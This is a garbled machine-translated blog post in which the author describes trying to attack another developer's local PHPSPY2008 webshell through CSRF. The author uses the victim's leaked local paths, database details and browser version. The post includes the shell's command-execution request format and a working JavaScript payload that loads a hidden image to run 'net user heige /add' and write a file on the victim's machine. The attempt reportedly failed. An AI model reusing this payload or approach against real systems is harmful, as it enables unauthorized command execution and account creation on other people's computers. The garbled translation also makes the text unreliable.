By: superhei
Just a fun
A few days ago, I read angel's blog to know that he is writing PHPSPY2008: http://www.sablog.net/blog/phpspy-2008/. besides, he also gave a lot of test slides, like:
Http://www.sablog.net/blog/attachment.php? Id = 543
In these images, angel exposes a lot of information, such as the connection and relative path of the Local web server:
Http: // localhost/phpspy/2008.php
Absolute path: F:/www/phpspy/
PHPSPY2007 and PHPSPY2006 are available in the same directory.
There are also some structures of his local mysql: including the database name and the main prefix. I remember there is another user's md5 hash [It seems to have been deleted now :)], in addition, angel uses Maxthon 2.06.
This information is very dangerous, so I decided to test whether I could use this information or not. Can I use own angels box. [just a fun]:
Idea 1: Try the md5 hash
Idea 2: directly use csrf to directly execute the command through http: // localhost/phpspy/2008. php
Thinking 1 is very troublesome to try, and it is not really difficult to think about. Thinking 2 is easy to act and intuitive, and I can make up
Xss/csrf in penetration test [1] does not use csrf attacks. First, let's first understand how to execute command variable submission in 2008. php. At that time, I didn't know whether angel had changed. However, there are still 2006 and 2007 in his directory. At this time, angel contacted me and asked our friends in the Group to test 2008.php. Haha, it's time ....
So I looked at the format submitted by the 2008. php Command Execution:
POST/2008.php? Action = shell HTTP/1.1
...............
Execfunc = system & command = net + user & submit = % C8 % B7 % B6 % A8
Can we change to get for submission? Submit: 2008.php? Action = shell & execfunc = system & command = net user. The Request variable [2] is used.
OK. angel uses Maxthon 2.06 as the core of ie. There should be no security plug-ins like noscript on ff. We can use js:
<Script>
Var url = http: // localhost/phpspy/2008.php? Action = shell & execfunc = system & command = net user heige/add | echo fuck> c: \ heige.txt;
GetURL (url );
Function getURL (s ){
Var image = new Image ();
Image. style. width = 0;
Image. style. height = 0;
Image. src = s;
}
</Script>
And then put him in 2008 of one of my spaces. in php, I am waiting to send it to angel for testing. However, after I finish angel online, I have to wait for 2nd days, so I said 2008 in the group. php is not very ideal in my space, and angel actually links in .....
Result: I did not succeed. angel said that he did not log on to his http: // localhost/phpspy/2008.php. In fact, the test code is not logged on !!!, However, cookies should be saved, but angel says that the Cookies cannot be saved due to computer problems !!!!! Tian Yi ~~~, Everything is God! :)
Finally, xss/csrf is very sinister and does not defend against attacks. When I was writing this article, I was reading it with two eyes .....
[1]: html href = "http://superhei.blogbus.com/logs/11257167.html" target = _ blank>Http://superhei.blogbus.com/logs/11257167.html
[2]:Http://superhei.blogbus.com/logs/11412189.html